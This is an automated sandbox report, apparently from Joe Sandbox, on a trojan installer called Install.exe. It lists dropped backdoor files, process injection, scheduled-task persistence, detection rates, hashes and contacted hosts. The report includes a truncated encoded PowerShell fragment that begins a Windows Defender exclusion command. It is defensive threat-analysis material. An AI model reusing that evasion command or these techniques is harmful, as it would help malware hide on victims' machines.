Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\nslookup.exe | Code function: 22_2_000000014000C920 cpuid 22_2_000000014000C920
Source: C:\Users\user\AppData\Roaming\34432.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\nslookup.exe | Code function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,22_2_00000001400029E8
Source: C:\Windows\System32\dllhost.exe | Code function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Users\user\Desktop\Install.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
MITRE ATT&CK matrix (columns): Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts111
Windows Management Instrumentation
11
Scheduled Task/Job
1
Access Token Manipulation
1
Disable or Modify Tools
1
Credential API Hooking
1
System Time Discovery
Remote Services11
Archive Collected Data
Exfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts11
Native API
Boot or Logon Initialization Scripts512
Process Injection
21
Deobfuscate/Decode Files or Information
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
Exfiltration Over Bluetooth1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts21
Command and Scripting Interpreter
Logon Script (Windows)11
Scheduled Task/Job
2
Obfuscated Files or Information
Security Account Manager26
System Information Discovery
SMB/Windows Admin Shares1
Clipboard Data
Automated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts11
MITRE ATT&CK Matrix (technique grid with per-technique hit counts)
Behavior Graph ID: 597646, Sample: Install.exe, Start date: 27/03/2022, Architecture: WINDOWS, Score: 100

Process tree as encoded in the behavior graph (a child process is listed under the process that started it; bracketed numbers are the per-process counters shown on the graph nodes; signatures and dropped files are listed with the process they were attributed to):

• Start (Install.exe): Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; .NET source code references suspicious native API functions; 8 other signatures
  • Install.exe [9]
    • dropped: C:\...\ChiefKeefofficialnaxyi_crypted(6).exe (PE32); C:\Users\user\AppData\Roaming\34432.exe (PE32+)
    • 34432.exe [5]: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
      • dropped: C:\Users\user\AppData\Roaming\...\chrome.exe (PE32+)
      • cmd.exe
        • chrome.exe
          • cmd.exe: Encrypted powershell cmdline option found
            • powershell.exe: Found suspicious powershell code related to unpacking or dynamic code loading
            • conhost.exe
        • conhost.exe
      • cmd.exe [1]: Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules
        • powershell.exe [19]
        • powershell.exe [23]
        • conhost.exe
      • cmd.exe
        • conhost.exe
        • schtasks.exe
      • nslookup.exe
    • ChiefKeefofficialnaxyi_crypted(6).exe [1]: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
      • AppLaunch.exe [15, 3]: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); network: ip-api.com 208.95.112.1, 49735, 80, TUT-ASUS, United States
      • conhost.exe
  • powershell.exe: Creates files in the system32 config directory; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
    • dllhost.exe: Creates a thread in another existing process (thread injection)
      • 5 other processes
    • conhost.exe
  • chrome.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • cmd.exe: Encrypted powershell cmdline option found
      • powershell.exe: Found suspicious powershell code related to unpacking or dynamic code loading
      • conhost.exe
  • powershell.exe: Found suspicious powershell code related to unpacking or dynamic code loading
    • conhost.exe

Submitted file:

Source | Detection | Scanner | Label
Install.exe | 41% | Virustotal |
Install.exe | 73% | ReversingLabs | Win32.Trojan.Zenpak

Dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\34432.exe | 100% | Avira | HEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 100% | Avira | HEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\34432.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\34432.exe | 35% | Virustotal |
C:\Users\user\AppData\Roaming\34432.exe | 77% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | 50% | Virustotal |
C:\Users\user\AppData\Roaming\Chrome\chrome.exe | 77% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
Unpacked PE files:

Source | Detection | Scanner | Label
22.0.nslookup.exe.140000000.2.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.10.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.0.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.8.unpack | 100% | Avira | TR/Injector.vwktt
2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
39.0.dllhost.exe.140000000.3.unpack | 100% | Avira | RKIT/Agent.avskt
33.2.chrome.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.0.nslookup.exe.140000000.1.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.4.unpack | 100% | Avira | RKIT/Agent.avskt
30.2.chrome.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
30.0.chrome.exe.20000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.0.nslookup.exe.140000000.5.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.1.unpack | 100% | Avira | RKIT/Agent.avskt
39.0.dllhost.exe.140000000.8.unpack | 100% | Avira | RKIT/Agent.avskt
4.0.34432.exe.770000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
22.2.nslookup.exe.140000000.0.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.5.unpack | 100% | Avira | RKIT/Agent.avskt
33.0.chrome.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
5.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
4.2.34432.exe.770000.0.unpack | 100% | Avira | HEUR/AGEN.1221921
39.2.dllhost.exe.140000000.0.unpack | 100% | Avira | RKIT/Agent.avskt
39.0.dllhost.exe.140000000.12.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.6.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.0.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.10.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.6.unpack | 100% | Avira | RKIT/Agent.avskt
22.0.nslookup.exe.140000000.12.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.3.unpack | 100% | Avira | TR/Injector.vwktt
22.0.nslookup.exe.140000000.4.unpack | 100% | Avira | TR/Injector.vwktt
39.0.dllhost.exe.140000000.2.unpack | 100% | Avira | RKIT/Agent.avskt
No Antivirus matches
URLs:

Source | Detection | Scanner | Label
http://ip-api.com4Uk | 0% | Avira URL Cloud | safe
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM | 0% | Avira URL Cloud | safe
http://crl.mp | 0% | Virustotal |
http://crl.mp | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
URLs found in memory or binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
http://ip-api.com4Uk | AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM | powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.mp | powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.codeplex.com/DotNetZip | AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 597646
Start date and time: 2022-03-27 00:39:51 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Install.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 5
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@44/26@1/1
EGA Information:
• Successful, ratio: 57.1%
HDC Information:
• Successful, ratio: 51.9% (good quality ratio 43.1%)
• Quality average: 58.5%
• Quality standard deviation: 36.7%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 265
• Number of non-executed functions: 190
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.242.101.226, 40.125.122.176, 20.54.110.249, 52.152.110.14
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target 34432.exe, PID 6836 because it is empty
• Execution Graph export aborted for target chrome.exe, PID 5460 because it is empty
• Execution Graph export aborted for target chrome.exe, PID 6564 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
Time | Type | Description
01:41:04 | API Interceptor | 123x Sleep call for process: powershell.exe modified
01:41:33 | API Interceptor | 2x Sleep call for process: 34432.exe modified
01:41:47 | Task Scheduler | Run new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Process: C:\Users\user\AppData\Roaming\34432.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 973
Entropy (8bit): 5.374440234733254
Encrypted: false
SSDEEP: 12:Q3La/hVAWDLI4MWuCqDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0Q:MLqE4K5E4KrL1qE4GiD0E4KeGasXE4+Y
MD5: 06639220FD6B2DCCDA25EAE889B6BCC8
SHA1: 3EDFCBE94838702A978D3D518B2358560A296FD0
SHA-256: 32F1B0CAE8509079F3F044C5655800CD760DB66E792B451DF2C919B6129DCB83
SHA-512: 61EBE07C66BA18BE8838223D7946EA14DAF46CE3CEB1F27A59958857B22F00E2EF872A56D7D05C58747D57558BD07D4B097B604CA34D280B6761F3024A20A53F
Malicious: false
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 18817
Entropy (8bit): 5.004929862695359
Encrypted: false
SSDEEP: 384:Kwib4LEVoGIpN6KQkj2jkjh4iUxLzp0ifOdBVNXp5xvOjJpYoY4Qib4w:KEEV3IpNBQkj22h4iUxLzp0ifOdBVNZY
MD5: DA4B150893016C59B1E5DE988406A425
SHA1: 9CAF9C1A8F844A0FA8D88DC30F29BE7B023E7079
SHA-256: 5107772D1007FD535B026DF52ADF8864E7C2D4C1ACAB3CD03A5C112517A426DF
SHA-512: 533A894A8EBB39BF2D785C8E715615A994DF6D797650FCD1D7A3949C90F2682B24BFA596BD2CED15B7BA8817483E68D96D968AC64D784176D53584A116ECEDE0
Malicious: false
Reputation: unknown
Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1292
Entropy (8bit): 5.362943121948868
Encrypted: false
SSDEEP: 24:3vUrcPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9b6F:8wPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
MD5: 12513EC7250BFC953C71EA941E82B42C
SHA1: F821E6EF80B3144841A0385A593C2605978BAD45
SHA-256: 91249CB24DDFEB9DC31A3EACB04449E3422C6EB754265D23C897A413EFB62592
SHA-512: 71B09E3B079329EB741B2ACF89C28870EB225EC51DA34CDB01BE31430272892E00F134B66F6FCF1F0D5AD5368FB20554F9C512794D84BE3015388A63195403E2
Malicious: false
Reputation: unknown
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: unknown
Preview: 1

Seven further files dropped by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe have the same file type, size, entropy, SSDEEP, MD5, SHA1, SHA-256 and SHA-512 values and the same preview as the entry above.
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                           • Antivirus: Virustotal, Detection: 35%
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):5028144
                          Entropy (8bit):6.125106867276156
                          Encrypted:false
                          SSDEEP:98304:aqbWYKVEOkkj9NM8zWTl2ALz6dggqBu0teFFJyMEllE+VeJqUH:idzW0QuRabllA7
                          MD5:D55DC38B4EE6BED2168E74194533C572
                          SHA1:431F6F9AEB280102E8764A5184CABE6CC98052CA
                          SHA-256:4B283EC8E073FB61BBB612A152EB332A5C92E7473CF6584A8B716FD87684A936
                          SHA-512:C731304F2EC41AC9A49CA1727ED948299A40702D78A2B0BC9506E50AEAB97B5ADCF09D8958E48F8A0FFC9E2FF78941ED68DCAED2BAB06FEA847EB29EFAE58150
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                           • Antivirus: Virustotal, Detection: 50%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<b..................B..@......;.........B...@..........................pL..............................................C.<....................pL.0I............................................C.@.............B.\............................text....?.......@.................. ..`.nQuHRq..o@..P...p@..D.............. ..`.rdata........B.......B.............@..@.data.........C.......C.............@....9SAT.........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.5305777622288925
                          Encrypted:false
                          SSDEEP:96:BZioj4N2c+qDo1Zo8FZikj4N2c+qDo1Zoe3x1xvxjZiij4N2c+qDo1ZooSx/x/xa:eSc57ec5Tgc5c6G
                          MD5:65537AD9317CD9A794FF2C8A25E3A7F8
                          SHA1:99CFC1994EEDC8F868B1245E655587DB41F269DF
